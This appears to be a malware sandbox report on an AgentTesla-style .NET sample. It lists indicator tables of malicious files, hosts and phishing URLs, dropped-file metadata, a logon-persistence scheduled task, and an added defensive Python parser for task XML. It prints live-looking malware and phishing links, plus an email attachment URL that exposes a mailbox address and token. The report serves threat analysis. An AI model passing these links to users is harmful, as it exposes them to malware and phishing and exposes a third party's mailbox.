us2.smtp.mailhostbox.com | Swift_copy.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.224
us2.smtp.mailhostbox.com | Pliego+Tcnico+-+Desmontaje+de+puerta+y+.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.223
us2.smtp.mailhostbox.com | RFQ11087.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.225
us2.smtp.mailhostbox.com | rPAGO_8732.exe | Get hash | malicious | AgentTesla | Browse | 208.91.198.143
ip-api.com | documentos.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | PI-236031.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | INV 0983 OSY 240524_PDF.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | 99200032052824.bat.exe | Get hash | malicious | GuLoader | Browse | 208.95.112.1
ip-api.com | PO_27052024.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | Reiven RFQ-27-05-2024.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | ev1NIvTd6f.exe | Get hash | malicious | Unknown | Browse | 208.95.112.1
ip-api.com | https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDE | Get hash | malicious | DCRat | Browse | 208.95.112.1
ip-api.com | uChcvn3L6R.exe | Get hash | malicious | DCRat | Browse | 208.95.112.1
ip-api.com | uChcvn3L6R.exe | Get hash | malicious | DCRat | Browse | 208.95.112.1
api.ipify.org | DRAWING_SHEET_P02405912916 .exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
api.ipify.org | proforma invoice.bit.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 172.67.74.152
api.ipify.org | INV 0983 OSY 240524_PDF.exe | Get hash | malicious | AgentTesla | Browse | 104.26.12.205
api.ipify.org | https://attachments.office.net/owa/cmangava%40tharisa.com/service.svc/s/GetAttachmentThumbnail?id=AAMkAGE2N2U5NmFkLWIzMjEtNGMwNS1iOWVlLWExNTBkNDk2NTZjMABGAAAAAAAsNFCwuPDISrln6MRbSR5lBwBC4JDOFd8jTJozG%2BNc7YRrAAAAmcUBAABu3YNoqzF8SLI68HoWeAXzAAFRD3sAAAABEgAQAOXLRvcdfU5Kkg7Zx598XsI%3D&thumbnailType=2&token=eyJhbGciOiJSUzI1NiIsImtpZCI6IkU1RDJGMEY4REE5M0I2NzA5QzQzQTlFOEE2MTQzQzAzRDYyRjlBODAiLCJ0eXAiOiJKV1QiLCJ4NXQiOiI1ZEx3LU5xVHRuQ2NRNm5vcGhROEE5WXZtb0EifQ.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.QgmzIBWvZG6gLwDV2SGPl9TdStXctQrpU_xiIGcL5I4eoVDkUPzqcKcrSAnwOD_E73nNMbCTWC-kgcJIIFGhLmh8iFWITRD5MwmaJN23JV7c8rlmzHlxnoqm8tPo98Soui3XZZYSaJZVTruXDBhUCiweHA69qYSoZDJxVUYZDvl5KvXMWJkA_ui0Vq1Sw7pPL5h9t4_QlGAarVBz6O9q21EGSBoX_hWPpcaEGJwoBDVeI-G6VvbkXzy9bJEMEZ6N-WzLyQtuKS9HVJBafIkUxsf0pIhhnJUluyukhnQ1dZohnpQr8e5v0Xoa3SObMFt_C5SeZHG2hFyxqFdeBhKQ_w&X-OWA-CANARY=X-OWA-CANARY_cookie_is_null_or_empty&owa=outlook.office.com&scriptVer=20240517003.15&clientId=1A63CAED249649AEBB5264A13128C2B5&animation=true&persistenceId=80cb7b14-7011-42b1-acde-250d928510f9 | Get hash | malicious | HTMLPhisher | Browse | 104.26.13.205
api.ipify.org | PO_27052024.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
api.ipify.org | Remittance#26856.html | Get hash | malicious | HTMLPhisher | Browse | 104.26.13.205
api.ipify.org | https://interface01.nsxtlmv.workers.dev/ | Get hash | malicious | HTMLPhisher | Browse | 104.26.13.205
api.ipify.org | http://christiantensen478345.pages.dev/help/contact/45367900411236/ | Get hash | malicious | Unknown | Browse | 172.67.74.152
api.ipify.org | https://louiss-comxinh.pages.dev/help/contact/388061959224233 | Get hash | malicious | Unknown | Browse | 172.67.74.152
api.ipify.org | http://worker-office-onedrive.td5xtn-b1lv7f1ymscd0.workers.dev/favicon.ico | Get hash | malicious | HTMLPhisher | Browse | 172.67.74.152
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
PUBLIC-DOMAIN-REGISTRYUS | Purchase Order.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.223
PUBLIC-DOMAIN-REGISTRYUS | file.exe | Get hash | malicious | SystemBC | Browse | 103.211.216.137
PUBLIC-DOMAIN-REGISTRYUS | http://dhl.de-globe.cloud.yaazhiyas.in/portal.php?country.x=Global&one=ok&flowId=ul&_Email=data | Get hash | malicious | Unknown | Browse | 204.11.58.150
PUBLIC-DOMAIN-REGISTRYUS | https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4 | Get hash | malicious | HTMLPhisher | Browse | 208.91.198.178
PUBLIC-DOMAIN-REGISTRYUS | PI_230524.exe | Get hash | malicious | AgentTesla, GuLoader | Browse | 103.21.58.98
PUBLIC-DOMAIN-REGISTRYUS | https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4 | Get hash | malicious | HTMLPhisher | Browse | 208.91.198.178
PUBLIC-DOMAIN-REGISTRYUS | https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4 | Get hash | malicious | HTMLPhisher | Browse | 208.91.198.178
PUBLIC-DOMAIN-REGISTRYUS | SwiftCopy_23052024.exe | Get hash | malicious | FormBook, GuLoader | Browse | 103.21.58.98
PUBLIC-DOMAIN-REGISTRYUS | ASCD0001 INQ9829......pdf.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | Quotation - 00645.exe | Get hash | malicious | AgentTesla | Browse | 199.79.62.115
TUT-ASUS | documentos.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | PI-236031.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | INV 0983 OSY 240524_PDF.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | 99200032052824.bat.exe | Get hash | malicious | GuLoader | Browse | 208.95.112.1
TUT-ASUS | PO_27052024.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | Reiven RFQ-27-05-2024.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | ev1NIvTd6f.exe | Get hash | malicious | Unknown | Browse | 208.95.112.1
TUT-ASUS | https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDE | Get hash | malicious | DCRat | Browse | 208.95.112.1
TUT-ASUS | uChcvn3L6R.exe | Get hash | malicious | DCRat | Browse | 208.95.112.1
TUT-ASUS | uChcvn3L6R.exe | Get hash | malicious | DCRat | Browse | 208.95.112.1
CLOUDFLARENETUS | inquiry EBS# 82785.exe | Get hash | malicious | FormBook | Browse | 104.21.81.34
CLOUDFLARENETUS | DRAWING_SHEET_P02405912916 .exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
CLOUDFLARENETUS | PAYMENT COPY.exe | Get hash | malicious | FormBook | Browse | 172.67.137.210
CLOUDFLARENETUS | Shipping Document.exe | Get hash | malicious | FormBook | Browse | 172.67.190.203
CLOUDFLARENETUS | NUEVA ORDEN DE COMPRAsxlx..exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
CLOUDFLARENETUS | PAYMENT ADVICE.exe | Get hash | malicious | FormBook | Browse | 172.67.190.203
CLOUDFLARENETUS | proforma invoice.bit.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 172.67.74.152
CLOUDFLARENETUS | INV 0983 OSY 240524_PDF.exe | Get hash | malicious | AgentTesla | Browse | 104.26.12.205
CLOUDFLARENETUS | ZAMOWIEN.EXE.exe | Get hash | malicious | DBatLoader, FormBook | Browse | 172.67.190.76
CLOUDFLARENETUS | https://attachments.office.net/owa/cmangava%40tharisa.com/service.svc/s/GetAttachmentThumbnail?id=AAMkAGE2N2U5NmFkLWIzMjEtNGMwNS1iOWVlLWExNTBkNDk2NTZjMABGAAAAAAAsNFCwuPDISrln6MRbSR5lBwBC4JDOFd8jTJozG%2BNc7YRrAAAAmcUBAABu3YNoqzF8SLI68HoWeAXzAAFRD3sAAAABEgAQAOXLRvcdfU5Kkg7Zx598XsI%3D&thumbnailType=2&token=eyJhbGciOiJSUzI1NiIsImtpZCI6IkU1RDJGMEY4REE5M0I2NzA5QzQzQTlFOEE2MTQzQzAzRDYyRjlBODAiLCJ0eXAiOiJKV1QiLCJ4NXQiOiI1ZEx3LU5xVHRuQ2NRNm5vcGhROEE5WXZtb0EifQ.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.QgmzIBWvZG6gLwDV2SGPl9TdStXctQrpU_xiIGcL5I4eoVDkUPzqcKcrSAnwOD_E73nNMbCTWC-kgcJIIFGhLmh8iFWITRD5MwmaJN23JV7c8rlmzHlxnoqm8tPo98Soui3XZZYSaJZVTruXDBhUCiweHA69qYSoZDJxVUYZDvl5KvXMWJkA_ui0Vq1Sw7pPL5h9t4_QlGAarVBz6O9q21EGSBoX_hWPpcaEGJwoBDVeI-G6VvbkXzy9bJEMEZ6N-WzLyQtuKS9HVJBafIkUxsf0pIhhnJUluyukhnQ1dZohnpQr8e5v0Xoa3SObMFt_C5SeZHG2hFyxqFdeBhKQ_w&X-OWA-CANARY=X-OWA-CANARY_cookie_is_null_or_empty&owa=outlook.office.com&scriptVer=20240517003.15&clientId=1A63CAED249649AEBB5264A13128C2B5&animation=true&persistenceId=80cb7b14-7011-42b1-acde-250d928510f9 | Get hash | malicious | HTMLPhisher | Browse | 104.17.2.184
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | DRAWING_SHEET_P02405912916 .exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | NUEVA ORDEN DE COMPRAsxlx..exe | Get hash | malicious | Snake Keylogger | Browse | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | proforma invoice.bit.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | INV 0983 OSY 240524_PDF.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | PO_27052024.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | 01vwXiyQ8K.exe | Get hash | malicious | Quasar | Browse | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | xA4LQYIndy.exe | Get hash | malicious | DCRat | Browse | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | https://kruekanlogin.gitbook.io/ | Get hash | malicious | Unknown | Browse | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | https://fbreview-requestnow.github.io/ajaz | Get hash | malicious | Unknown | Browse | 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDE | Get hash | malicious | DCRat | Browse | 172.67.74.152
                                                No context
Process: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 2232
Entropy (8bit): 5.379460230152629
Encrypted: false
SSDEEP: 48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyds:fLHyIFKL3IZ2KRH9OugEs
MD5: 34A24F781FF96B10A229B570B76ADB2F
SHA1: 05B685491D1EF3C94899823A08EF75211AB90338
SHA-256: A8467594B8A3731CDB4833955ED406BE0513088990DE27AD176B552155E5306C
SHA-512: C0F222E2826D34B8B62F4AA9D08034C411B15E20E981F3DF8FD7E04CC8CE1D9B9F02213D1E22A40749F53DCE5511B9371A8202AFE4E1CEDE8113EE6C84951B50
Malicious: false
Preview: @...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                (Seven further files dropped by powershell.exe are byte-identical to the one above: same 60-byte size, same entropy and the same MD5/SHA1/SHA-256/SHA-512. Their repeated entries are omitted. The "PowerShell test file to determine AppLocker lockdown mode" is the benign probe that powershell.exe itself writes to the user's temp directory at start-up to see whether AppLocker would block scripts; one copy per PowerShell launch, so eight copies mean eight PowerShell invocations, not eight malware-authored files. The Defender-exclusion command noted in the signatures is what makes those invocations interesting, not these files.)
                                                Process:C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1597
                                                Entropy (8bit):5.100230155050965
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLu5xvn:cge7QYrFdOFzOzN33ODOiDdKrsuT6vv
                                                MD5:65D16DDB43A933FE9E4A07A22D171FB1
                                                SHA1:1D4808C4CB0D8E6053F1826D0FAA97A455548D5F
                                                SHA-256:333336D921662435A1D7E63B0E3FD1637B6EF75435E1C5588FE6E0CCB7F74F6E
                                                SHA-512:9411FDBF5EAD27D58EB71AA761D579AC16FA8E8DF04AB1E7819C482B7B04F461CE4E783336B1DDF6559BE9EC0B8A7770C291D45F39912D12CEBBAE76E4F6DF60
                                                Malicious:true
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                                Process:C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1597
                                                Entropy (8bit):5.100230155050965
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLu5xvn:cge7QYrFdOFzOzN33ODOiDdKrsuT6vv
                                                MD5:65D16DDB43A933FE9E4A07A22D171FB1
                                                SHA1:1D4808C4CB0D8E6053F1826D0FAA97A455548D5F
                                                SHA-256:333336D921662435A1D7E63B0E3FD1637B6EF75435E1C5588FE6E0CCB7F74F6E
                                                SHA-512:9411FDBF5EAD27D58EB71AA761D579AC16FA8E8DF04AB1E7819C482B7B04F461CE4E783336B1DDF6559BE9EC0B8A7770C291D45F39912D12CEBBAE76E4F6DF60
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
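The task definition above (dropped first by the sample, then by its copy XNYbGrcoFr.exe) is the persistence mechanism: a LogonTrigger task registered by the user account itself with RunLevel LeastPrivilege and an InteractiveToken logon, which needs no elevation to create and re-launches the payload at every logon. The following is an added example and not code from the Joe Sandbox report or its tooling: a parser for Task Scheduler XML that pulls out the trigger, principal and action and flags that pattern. The report's preview is cut off before the Actions element, so the constructed sample assumes an Exec action pointing at the dropped C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe; that assumption, the list of user-writable directories and the finding texts are the example's, not the report's.

```python
"""Task Scheduler XML triage for a logon-trigger persistence task.
Added example, not Joe Sandbox code; the task XML below is constructed."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Directories an unprivileged user can write to (assumption: a typical hunting list). A task whose
# binary lives here needs no admin rights to plant and comes back at every logon.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


def load_task(xml_text: str) -> ET.Element:
    """The dropped file declares encoding="UTF-16" but is ASCII (see its File Type line); expat
    rejects a UTF-16 declaration on str input, so the declaration is stripped before parsing."""
    return ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text))


def text_of(root: ET.Element, path: str) -> str:
    el = root.find(path, NS)
    return (el.text or "").strip() if el is not None else ""


def triage_task(xml_text: str) -> dict:
    """Return the persistence-relevant fields plus a list of findings (empty for a benign task)."""
    root = load_task(xml_text)
    command = text_of(root, "t:Actions/t:Exec/t:Command")
    result = {
        "author": text_of(root, "t:RegistrationInfo/t:Author"),
        "logon_trigger": text_of(root, "t:Triggers/t:LogonTrigger/t:Enabled").lower() == "true",
        "run_level": text_of(root, "t:Principals/t:Principal/t:RunLevel"),
        "command": command,
        "findings": [],
    }
    if result["logon_trigger"]:
        user = text_of(root, "t:Triggers/t:LogonTrigger/t:UserId")
        result["findings"].append(f"LogonTrigger enabled: runs at every logon of {user}")
    if any(d in command.lower() for d in USER_WRITABLE):
        result["findings"].append(f"Exec command lives in a user-writable directory: {command}")
    if result["findings"] and result["run_level"] == "LeastPrivilege":
        # An unelevated task for the registering user can be created without admin rights.
        result["findings"].append("LeastPrivilege: registered without elevation, no UAC prompt involved")
    return result


# Constructed from the report's preview; the Actions element is an assumption (the preview is
# truncated before it) and points at the self-copy path seen in the process list.
SAMPLE_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <!-- assumed for the example: not visible in the report's truncated preview -->
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe</Command>
    </Exec>
  </Actions>
</Task>
"""

if __name__ == "__main__":
    report = triage_task(SAMPLE_TASK)
    print(f"author={report['author']} run_level={report['run_level']} command={report['command']}")
    for finding in report["findings"]:
        print(" -", finding)
```

Run over a real dropped task file, read it as text and strip the declaration the same way; a task that reads as UTF-16 on disk (the usual case for exported tasks) should instead be decoded before being passed in.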
                                                Process:C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):708096
                                                Entropy (8bit):7.952505061798699
                                                Encrypted:false
                                                SSDEEP:12288:VSKx504bFYOl2Ez2uwJhCuiZlYvXiCf6sUO7FgoPOXyi:QKw4bfMEzeJhElYfVCgel
                                                MD5:B7DB10EC32FE6F53EE4A76E261761C27
                                                SHA1:283EB987F7ED2BFB1B4FBE413DD58B5CA8F31AFD
                                                SHA-256:A0970A01C8310F5643451D71A863709B17E59814B12E81908F37CB649E3D70DE
                                                SHA-512:DAC0AD887CFB6F0379B1238D23AA42F4462CE093459B4BE60478365C8DE48EBF2963CA82F9B3CD83C0B7FC5FD1D8FF370A9F9B77017108EA49BF28C046193094
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 63%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5f................0.................. ........@.. .......................@............@.....................................O............................ ..........p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......,`...a............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*".(.....*".(.....*.r...p.....*..(.......~....s....}......{....o....}....*....0...............{....r...po......{....o ...o!.....{....o ...r...p.o"...&.{....o ...r...p.o"...&.{....o#.....{....o$....+\.sF.......o%...o;.......o&...o=.......o&...o?.......o&...oA.......o&...oC.......o'...oE......o(.....-.....&.......{....o).......*.............
                                                Process:C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:false
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.952505061798699
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:GestorRemesasCONFIRMIMING.exe
                                                File size:708'096 bytes
                                                MD5:b7db10ec32fe6f53ee4a76e261761c27
                                                SHA1:283eb987f7ed2bfb1b4fbe413dd58b5ca8f31afd
                                                SHA256:a0970a01c8310f5643451d71a863709b17e59814b12e81908f37cb649e3d70de
                                                SHA512:dac0ad887cfb6f0379b1238d23aa42f4462ce093459b4be60478365c8de48ebf2963ca82f9b3cd83c0b7fc5fd1d8ff370a9f9b77017108ea49bf28c046193094
                                                SSDEEP:12288:VSKx504bFYOl2Ez2uwJhCuiZlYvXiCf6sUO7FgoPOXyi:QKw4bfMEzeJhElYfVCgel
                                                TLSH:FEE42340B7B99B22D87983B8459A04F547B3E49E5429EB4C6E4171DE5CB2B400B60FFB
